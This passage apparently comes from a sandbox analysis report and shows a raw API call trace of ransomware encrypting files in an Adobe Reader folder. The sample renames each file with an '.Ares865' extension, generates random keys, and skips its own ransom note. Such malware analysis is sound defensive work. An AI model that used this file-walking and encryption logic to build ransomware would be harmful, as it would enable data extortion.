dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0156.663] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=72704) returned 1 [0156.663] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0156.664] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0156.664] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0156.670] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0156.670] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0156.670] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0156.672] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="dut102.hsp" | out: lpString1="dut102.hsp") returned="dut102.hsp" [0156.672] lstrlenW (lpString="dut102.hsp") returned 10 [0156.672] lstrlenW (lpString="Ares865") returned 7 [0156.672] lstrcmpiW (lpString1="102.hsp", lpString2="Ares865") returned -1 [0156.672] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\dut102.hsp.Ares865") returned 106 [0156.672] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\dut102.hsp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\dut102.hsp"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\dut102.hsp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\dut102.hsp.ares865"), dwFlags=0x1) returned 1 [0156.676] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\dut102.hsp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\dut102.hsp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0156.676] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=376938) returned 1 [0156.676] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0156.677] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0156.677] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0156.698] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0156.698] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0156.698] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0156.704] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="dut32.clx" | out: lpString1="dut32.clx") returned="dut32.clx" [0156.704] lstrlenW (lpString="dut32.clx") returned 9 [0156.704] lstrlenW (lpString="Ares865") returned 7 [0156.704] lstrcmpiW (lpString1="t32.clx", lpString2="Ares865") returned 1 [0156.704] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\dut32.clx.Ares865") returned 105 [0156.704] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\dut32.clx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\dut32.clx"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\dut32.clx.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\dut32.clx.ares865"), dwFlags=0x1) returned 1 [0156.707] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\dut32.clx.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\dut32.clx.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0156.707] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=32756) returned 1 [0156.707] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0156.708] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0156.708] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0156.712] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0156.713] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0156.713] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0156.714] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="dut57.ths" | out: lpString1="dut57.ths") returned="dut57.ths" [0156.714] lstrlenW (lpString="dut57.ths") returned 9 [0156.714] lstrlenW (lpString="Ares865") returned 7 [0156.714] lstrcmpiW (lpString1="t57.ths", lpString2="Ares865") returned 1 [0156.715] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\dut57.ths.Ares865") returned 105 [0156.715] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\dut57.ths" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\dut57.ths"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\dut57.ths.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\dut57.ths.ares865"), dwFlags=0x1) returned 1 [0156.716] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\dut57.ths.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\dut57.ths.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0156.716] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=801792) returned 1 [0156.717] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0156.717] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0156.717] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0156.768] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0156.769] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0156.769] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0156.783] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="eng.hyp" | out: lpString1="eng.hyp") returned="eng.hyp" [0156.783] lstrlenW (lpString="eng.hyp") returned 7 [0156.783] lstrlenW (lpString="Ares865") returned 7 [0156.783] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\eng.hyp.Ares865") returned 103 [0156.784] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\eng.hyp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\eng.hyp"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\eng.hyp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\eng.hyp.ares865"), dwFlags=0x1) returned 1 [0156.786] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\eng.hyp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\eng.hyp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0156.787] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=48128) returned 1 [0156.787] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0156.788] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0156.788] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0156.801] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0156.806] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0156.806] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0156.811] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="eng32.clx" | out: lpString1="eng32.clx") returned="eng32.clx" [0156.811] lstrlenW (lpString="eng32.clx") returned 9 [0156.811] lstrlenW (lpString="Ares865") returned 7 [0156.811] lstrcmpiW (lpString1="g32.clx", lpString2="Ares865") returned 1 [0156.811] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\eng32.clx.Ares865") returned 105 [0156.811] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\eng32.clx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\eng32.clx"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\eng32.clx.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\eng32.clx.ares865"), dwFlags=0x1) returned 1 [0156.813] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\eng32.clx.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\eng32.clx.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0156.814] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=32741) returned 1 [0156.814] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0156.815] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0156.815] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0156.820] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0156.821] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0156.821] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0156.822] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="engphon.env.Ares865" | out: lpString1="engphon.env.Ares865") returned="engphon.env.Ares865" [0156.822] lstrlenW (lpString="engphon.env.Ares865") returned 19 [0156.822] lstrlenW (lpString="Ares865") returned 7 [0156.822] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0156.822] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7e11b040, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="est.hyp", cAlternateFileName="")) returned 1 [0156.822] lstrcmpiW (lpString1="est.hyp", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0156.822] lstrcmpiW (lpString1="est.hyp", lpString2="aoldtz.exe") returned 1 [0156.822] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="est.hyp" | out: lpString1="est.hyp") returned="est.hyp" [0156.822] lstrlenW (lpString="est.hyp") returned 7 [0156.822] lstrlenW (lpString="Ares865") returned 7 [0156.823] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\est.hyp.Ares865") returned 103 [0156.823] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\est.hyp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\est.hyp"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\est.hyp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\est.hyp.ares865"), dwFlags=0x1) returned 1 [0156.830] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\est.hyp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\est.hyp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0156.830] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=16384) returned 1 [0156.831] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0156.831] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0156.831] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0156.840] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0156.841] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0156.841] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0156.842] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="est133.lex" | out: lpString1="est133.lex") returned="est133.lex" [0156.842] lstrlenW (lpString="est133.lex") returned 10 [0156.842] lstrlenW (lpString="Ares865") returned 7 [0156.842] lstrcmpiW (lpString1="133.lex", lpString2="Ares865") returned -1 [0156.842] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\est133.lex.Ares865") returned 106 [0156.842] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\est133.lex" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\est133.lex"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\est133.lex.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\est133.lex.ares865"), dwFlags=0x1) returned 1 [0156.844] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\est133.lex.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\est133.lex.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0156.844] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2160640) returned 1 [0156.844] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0156.845] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0156.845] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0157.133] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0157.137] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0157.137] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0157.147] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="est32.clx" | out: lpString1="est32.clx") returned="est32.clx" [0157.148] lstrlenW (lpString="est32.clx") returned 9 [0157.148] lstrlenW (lpString="Ares865") returned 7 [0157.148] lstrcmpiW (lpString1="t32.clx", lpString2="Ares865") returned 1 [0157.148] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\est32.clx.Ares865") returned 105 [0157.148] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\est32.clx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\est32.clx"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\est32.clx.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\est32.clx.ares865"), dwFlags=0x1) returned 1 [0157.152] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\est32.clx.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\est32.clx.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0157.152] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=32748) returned 1 [0157.152] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0157.153] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0157.153] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0157.162] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0157.163] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0157.163] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0157.164] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="estphon.env.Ares865" | out: lpString1="estphon.env.Ares865") returned="estphon.env.Ares865" [0157.164] lstrlenW (lpString="estphon.env.Ares865") returned 19 [0157.164] lstrlenW (lpString="Ares865") returned 7 [0157.164] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0157.164] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93de7300, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7df2be60, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x93de7300, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x6800, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fin.hyp", cAlternateFileName="")) returned 1 [0157.164] lstrcmpiW (lpString1="fin.hyp", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0157.164] lstrcmpiW (lpString1="fin.hyp", lpString2="aoldtz.exe") returned 1 [0157.164] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="fin.hyp" | out: lpString1="fin.hyp") returned="fin.hyp" [0157.164] lstrlenW (lpString="fin.hyp") returned 7 [0157.164] lstrlenW (lpString="Ares865") returned 7 [0157.165] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\fin.hyp.Ares865") returned 103 [0157.165] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\fin.hyp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\fin.hyp"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\fin.hyp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\fin.hyp.ares865"), dwFlags=0x1) returned 1 [0157.167] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\fin.hyp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\fin.hyp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0157.167] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=26624) returned 1 [0157.168] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0157.168] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0157.168] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0157.172] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0157.173] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0157.173] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0157.174] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="fin32.clx" | out: lpString1="fin32.clx") returned="fin32.clx" [0157.174] lstrlenW (lpString="fin32.clx") returned 9 [0157.174] lstrlenW (lpString="Ares865") returned 7 [0157.174] lstrcmpiW (lpString1="n32.clx", lpString2="Ares865") returned 1 [0157.174] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\fin32.clx.Ares865") returned 105 [0157.174] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\fin32.clx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\fin32.clx"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\fin32.clx.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\fin32.clx.ares865"), dwFlags=0x1) returned 1 [0157.176] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\fin32.clx.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\fin32.clx.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0157.176] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=32762) returned 1 [0157.177] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0157.177] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0157.177] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0157.197] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0157.198] CryptGenRandom (in: hProv=0x2f0518, 